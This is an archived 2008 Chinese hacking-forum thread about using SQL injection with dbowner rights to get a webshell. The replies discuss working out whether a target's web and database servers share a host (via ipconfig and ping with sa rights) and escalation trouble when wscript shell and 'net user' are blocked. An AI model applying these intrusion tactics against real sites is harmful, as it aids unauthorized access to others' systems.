晶莹剔透§烈日灼然

44447777kun 发表于 2008-7-21 00:14

用ad能找到web目录就是web和sql是一体的找不到就是分开的，要是sa权限的，可以看看ip命令：ipconfig，这看到的是sql的ip，然后ping下玉米，得到的是web的ip，要是两个是一样的，就是一体的，另外，还存在在同一个内网的问题，看看端口什么的，你多练练就明白了，
[url=http://wpa.qq.com/msgrd?V=1&Uin=281598820&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子10 精华[url=http://forum.eviloctal.com/digest.php?authorid=66712]0[/url] 积分27 阅读权限40 性别男在线时间10 小时注册时间2006-10-14 最后登录2008-6-14 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66712]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=80557&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=80557&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-79959.html]flyboy88[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

吉普2020 发表于 2008-7-21 00:14

在提权上我也是遇到很多的问题，特别是wscript shell被禁用了连 net user都不能用的时候。我真不知道怎么办了。。。
偶是很菜很菜的鸟
帖子4 精华[url=http://forum.eviloctal.com/digest.php?authorid=79959]0[/url] 积分16 阅读权限40 在线时间6 小时注册时间2007-2-10 最后登录2007-12-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=79959]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=80822&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=80822&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-40731.html]hackloves[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male1.gif[/img]
晶莹剔透§烈日灼然

bbbbf 发表于 2008-7-21 00:15

什么命令都不能用,可以确定的是web与SQL没有分开,不知是不是SA的权限被降低了..[img]http://forum.eviloctal.com/images/smilies/yangcong/08.gif[/img]
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=453524604&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子26 精华[url=http://forum.eviloctal.com/digest.php?authorid=40731]0[/url] 积分87 阅读权限40 性别男在线时间46 小时注册时间2006-3-23 最后登录2008-7-14 [url=http://hi.baidu.com/xcrypt]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40731]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=80827&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=80827&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-40539.html]free2ndfree[/url] [img]http://forum.eviloctal.com/images/avatars/pw/stars2.gif[/img]
晶莹剔透§烈日灼然

大胃仔 发表于 2008-7-21 00:15

真的,感觉dbowner拿webshell有点老了,N人们几年前就玩上了.虽然老了,但我目前只会这方法,其他不就不知道了.
好多人发消息问咋成功不了,建议找个动画看看.我已经不拿什么webshell了,偶而上来看看!
建议看看hack520给我回复的那个帖!!!
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=40539]2[/url] 积分104 阅读权限40 性别男在线时间18 小时注册时间2006-3-22 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40539]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=81241&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=81241&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-93323.html]從此變黑[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然

页: [1]

【3.A.S.T】网络安全爱好者's Archiver

[讨论]SQL注入dbowner权限拿webshell